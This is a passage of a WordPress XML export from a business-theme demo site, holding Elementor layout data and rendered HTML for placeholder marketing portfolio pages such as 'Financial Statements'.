		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[811]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"759b1f9d","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4bee6d25","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"e966785","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"517cac51","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"1f78d6b4","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"50e4423d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5eda56ee","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5124a12","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1813e19b","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2c9be0ed","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5f5cb943","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"382ee553","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca083f3","elType":"widget","settings":{"editor":"<p>May 22, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"28cceda7","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5ef59f12","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6fd44f36","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2ca63cf2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6351dbe6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"188daba","elType":"section","settings":[],"elements":[{"id":"018cd30","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ddbd678","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1914e58","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c08d440","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4410a13","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"bee6607","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3eb71d8","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"987b0e3","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"18c78d7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"68f009d","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"b639518","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"0c0fffa","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2d68652","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"480994d","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"28446e9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a56c2d8","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"3c79216","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"82867c3","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"668f17b","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"ff46743","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"d83d4e8","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b4da032","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"04010ed","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4d72cdf","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Financial Statements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/financial-statements/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=814</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>814</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[financial-statements]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[815]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1deb4b19","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"19b383e9","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"500f054","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3071a763","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"828a94c","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"53d504ac","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"4d6cc997","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f023b1","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id"